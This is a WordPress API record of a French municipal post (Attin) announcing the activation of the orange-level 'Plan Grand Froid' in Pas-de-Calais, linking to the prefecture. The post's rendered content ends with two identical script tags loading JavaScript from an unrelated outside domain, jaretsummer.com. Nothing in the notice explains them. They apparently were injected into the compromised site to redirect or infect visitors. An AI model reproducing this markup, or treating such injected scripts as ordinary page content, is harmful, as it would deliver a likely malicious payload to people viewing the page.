{"id":2804,"date":"2021-02-08T13:25:52","date_gmt":"2021-02-08T12:25:52","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2804"},"modified":"2021-02-08T13:25:52","modified_gmt":"2021-02-08T12:25:52","slug":"plan-grand-froid-niveau-orange-active-dans-le-pas-de-calais","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2804","title":{"rendered":"Plan Grand froid niveau orange activ\u00e9 dans le Pas-de-Calais"},"content":{"rendered":"<p>En raison des conditions hivernales prononc\u00e9es qui s&rsquo;installent pour plusieurs jours dans notre r\u00e9gion, le Pr\u00e9fet du Pas-de-Calais a d\u00e9cid\u00e9 de d\u00e9clencher le Plan Grand Froid au niveau orange. Pour plus d&rsquo;informations sur les modalit\u00e9s et les conseils de pr\u00e9vention de ce dispositif, suivre le lien officiel des services de l&rsquo;Etat : <a href=\"https:\/\/www.pas-de-calais.gouv.fr\/content\/download\/31441\/207461\/file\/2018-02-21%20-%20D%C3%A9clenchement%20du%20niveau%20II%20du%20plan%20grand%20froid%20dans%20le%20Pas-de-Calais.pdf\">https:\/\/www.pas-de-calais.gouv.fr\/content\/download\/31441\/207461\/file\/2018-02-21%20-%20D%C3%A9clenchement%20du%20niveau%20II%20du%20plan%20grand%20froid%20dans%20le%20Pas-de-Calais.pdf <\/a><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En raison des conditions hivernales prononc\u00e9es qui s&rsquo;installent pour plusieurs jours dans notre r\u00e9gion, le Pr\u00e9fet du Pas-de-Calais a d\u00e9cid\u00e9 de d\u00e9clencher le Plan Grand Froid au niveau orange. Pour plus d&rsquo;informations sur les modalit\u00e9s et les conseils de pr\u00e9vention de ce dispositif, suivre le lien officiel des services de l&rsquo;Etat : https:\/\/www.pas-de-calais.gouv.fr\/content\/download\/31441\/207461\/file\/2018-02-21%20-%20D%C3%A9clenchement%20du%20niveau%20II%20du%20plan%20grand%20froid%20dans%20le%20Pas-de-Calais.pdf<\/p>\n","protected":false},"author":1,"featured_media":2805,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2804","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2804"}],"version-history":[{"count":1,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2804\/revisions"}],"predecessor-version":[{"id":2806,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2804\/revisions\/2806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/2805"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}